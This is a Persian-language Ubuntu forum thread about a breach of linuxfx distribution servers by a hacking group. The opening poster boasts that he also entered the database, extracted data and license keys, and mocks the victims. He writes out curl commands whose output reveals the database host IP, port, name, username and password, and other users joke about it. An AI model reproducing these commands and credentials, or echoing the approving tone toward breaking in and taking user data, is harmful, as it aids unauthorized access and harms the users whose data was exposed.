انجمنهای فارسی اوبونتو
خبرها => لینکهای خبری => نویسنده: ɴɪᴍᴀ در 06 خرداد 1401، 06:31 بظ
-
سلام
دیشب برای دومین بار گروه هکری kernal تونستن به سرور های linuxfx به راحتی وارد بشن و بازم تمام اطلاعات کاربرانش رو دانلود کنن، این کار اونقدر ساده بود که خیلیا هم وارد دیتابیس شدن و نابودش کردن ](*,) ;D
منم دیشب وارد شدم و اطلاعات زیادی رو تونستم استخراج کنم! و با یه regex ساده از توی اطلاعات لایسنس کی هارو در اوردم که دارید میبینید:
(https://forum.ubuntu-ir.org/index.php?action=dlattach;topic=154990.0;attach=53293;image)
(https://forum.ubuntu-ir.org/index.php?action=dlattach;topic=154990.0;attach=53291;image)
شما براحتی در اون زمان میتونستید همه اطلاعات دیتابیس رو اینجوری بگیرید:
$ curl http://www.linuxfx.org/linuxfx/x86/11.1/.http
mysql
19708
181.215.242.77
newbase
fxuser
$ curl http://www.linuxfx.org/linuxfx/x86/11.1/.https
99D28/gQxU%WY
و وارد دیتابیس بشید!
و البته که الان دیگه این روش کار نمیکنه و بجاش به گروه kernal گفتن احمق : )
(https://forum.ubuntu-ir.org/index.php?action=dlattach;topic=154990.0;attach=53295;image)
خلاصه دیگه از این اتفاق درس بگیرید و از توزیع های بدنام و نا امن استفاده نکنید!
و در آخر این پست تو ماستودون من: https://qoto.org/web/statuses/108372956301377147
پست (پارت دوم) در سایت کرنال: https://kernal.eu/posts/linuxfx-part-2/
و پارت اول: https://kernal.eu/posts/linuxfx/
-
افرین
-
مرسی :| ;D
-
الان میان میبرنت :o
-
چرا؟ استفاده بدی ازش نکردم که! ;D
-
نیما کلاه سفیده مهرداد 😉
-
:o تا جایی که من میبینم فقط تیشرتش سفیده کلاه هم نداره :D
-
سلام
دیشب برای دومین بار گروه هکری kernal تونستن به سرور های linuxfx به راحتی وارد بشن و بازم تمام اطلاعات کاربرانش رو دانلود کنن، این کار اونقدر ساده بود که خیلیا هم وارد دیتابیس شدن و نابودش کردن ](*,) ;D
منم دیشب وارد شدم و اطلاعات زیادی رو تونستم استخراج کنم! و با یه regex ساده از توی اطلاعات لایسنس کی هارو در اوردم که دارید میبینید:
خب یعنی الآن اینا از توزیع linuxfx استفاده کردند ؟ و چرا هکش کردند؟
-
نه، داشتن بررسیش میکردن که به امنیت بالاش پی بردن (دارید میبینید خودتون) ;D ;)
-
برای سرورشون از لینوکس خودشون استفاده کردند؟